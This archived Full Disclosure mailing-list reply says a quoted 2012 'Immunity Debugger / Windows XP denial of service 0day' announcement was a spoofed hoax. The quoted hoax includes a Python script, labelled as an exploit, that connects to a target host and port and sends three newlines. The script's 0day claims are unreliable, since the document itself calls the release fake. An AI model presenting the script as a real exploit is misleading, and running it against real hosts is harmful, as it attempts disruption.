Full Disclosure mailing list archives

Re: Windows XP denial of service 0day found in CTF exercise


From: adam () infosecinstitute com
Date: Tue, 17 Apr 2012 10:07:05 -0400

Guys, this is a fake release; someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.





On 04/17/2012 02:48 AM, Adam Behnke wrote:
Immunity Debugger Remote Denial of Service 0Day
Tested against versions 1.76 and 1.80 on Windows XP distributions.

Has not been tested for potential privilege escalation vectors.

We first wrote about Immunity Debugger here:
http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

Discovered by a student who wishes to remain anonymous in the
course CTF. This 0day exploit for Windows was discovered by a
student in the InfoSec Institute Ethical Hacking class, during an
evening CTF exercise. The student wishes to remain anonymous; he
has contributed a Python version of the 0day. A patch that can be
applied to Windows has not been made available. You can find a
Python version of the exploit to copy and paste here:


#!/usr/bin/python
# Windows XP denial of service 0day exploit
# discovered on 4.9.12 by InfoSec Institute student
# For full write up and description go to
# http://www.infosecinstitute.com/courses/ethical_hacking_training.html

import sys
import getopt
import socket


class Error(Exception):
    def __init__(self, error):
        self.errorStr = error

    def __str__(self):
        return repr(self.errorStr)


class Exploit(object):

    def __init__(self, targetHost, targetPort):
        self.targetHost = targetHost
        self.targetPort = targetPort

    def exploit(self, targetHost, targetPort):
        try:
            # inet_aton() rejects anything that is not a dotted-quad IPv4
            # address before we open the TCP connection.
            socket.inet_aton(targetHost)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((targetHost, targetPort))
        except socket.error:
            raise Error("Unable to exploit (Connect failed.)")

        # exploit: the whole payload is three newline characters written to
        # the already-connected stream socket (send(), not sendto(), since a
        # destination address is not valid on a connected TCP socket).
        try:
            s.send(b"\n\n\n")
        except socket.error:
            raise Error("Unable to exploit (Exploit failed.)")
        finally:
            s.close()


def usage():
    print("[!] Usage:")
    print("      ( -h, --help ):")
    print("            Print this message.")
    print("      ( --targetHost= ): Target host.")
    print("            --targetHost=127.0.0.1")
    print("      ( --targetPort= ): Target port.")
    print("            --targetPort=8888")


def main():
    print("[$] Windows XP 0Day")
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h",
                                   ["help", "targetHost=", "targetPort="])
    except getopt.GetoptError as err:
        # Print help information and exit; str(err) will read something
        # like "option -a not recognized".
        print("[!] Parameter error: " + str(err))
        usage()
        sys.exit(0)

    targetHost = None
    targetPort = None

    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt == "--targetHost":
            targetHost = arg
        elif opt == "--targetPort":
            targetPort = arg
        else:
            # I would be assuming to say we'll never get here.
            print("[!] Parameter error.")
            usage()
            sys.exit(0)

    if not targetHost:
        print("[!] Parameter error: targetHost not set.")
        usage()
        sys.exit(0)

    if not targetPort:
        print("[!] Parameter error: targetPort not set.")
        usage()
        sys.exit(0)

    exploit = Exploit(targetHost, targetPort)

    print("[*] Attempting to exploit:")
    try:
        exploit.exploit(targetHost, int(targetPort))
    except Error as error:
        print("[!] Exploit Error: %s" % (error.errorStr))
        sys.exit(0)
    print("[*] Exploit appears to have worked.")


# Standard boilerplate to call the main() function to begin
# the program.
if __name__ == '__main__':
    main()



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


